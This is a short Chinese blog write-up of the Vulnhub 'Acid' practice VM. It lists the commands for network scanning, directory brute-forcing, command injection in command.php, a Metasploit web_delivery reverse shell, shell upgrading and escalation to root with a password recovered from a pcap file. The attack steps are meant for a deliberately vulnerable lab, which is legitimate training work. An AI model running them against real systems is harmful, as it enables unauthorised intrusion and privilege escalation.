Vulnhub Acid

1、信息收集

1.1、netdiscover

netdiscover -i eth0 -r 192.168.118.0/24

1.2、 Nmap

nmap -sP -T4 192.168.118.0/24

nmap -sS -T4 -sV -O -p- 192.168.118.146

1.3 33447

view-source:http://192.168.118.146:33447/

 643239334c6d70775a773d3d  ==》 wow.jpg

1.4 wow.jpg

notepad++ 打开 

3761656530663664353838656439393035656533376631366137633631306434

==》

7aee0f6d588ed9905ee37f16a7c610d4

7aee0f6d588ed9905ee37f16a7c610d4

MD5 解密==》63425 (后面发现并没什么卵用)

1.5 dirbuster爆破

标题俩个路径:

http://192.168.118.146:33447/Challenge/

http://192.168.118.146:33447/Challenge/cake.php

==>

/Magic_Box

 再次爆破目录:

http://192.168.118.146:33447/Challenge/Magic_Box/command.php

 

 

2、漏洞挖掘

命令注入:

http://192.168.118.146:33447/Challenge/Magic_Box/command.php

3、 反弹shell

3.1、请移步:web_delivery

use exploit/multi/script/web_delivery 

su: must be run from a terminal

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

4、权限提升

cat /etc/passwd,发现需要关注的用户有:acid,saman,root

find / -user acid 2>/dev/null

发一个hint.pcapng

打开后跟踪tcp流

发现saman的密码:1337hax0r

su提权到saman、root,获得flag

再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt

notepad:

1、查找acid用户的文件

find / -user acid 2>/dev/null

2、使用metasploit反弹shell

exploit/multi/script/web_delivery 

 

posted @ 2018-11-21 17:26  竹小冉  阅读(741)  评论(0编辑  收藏  举报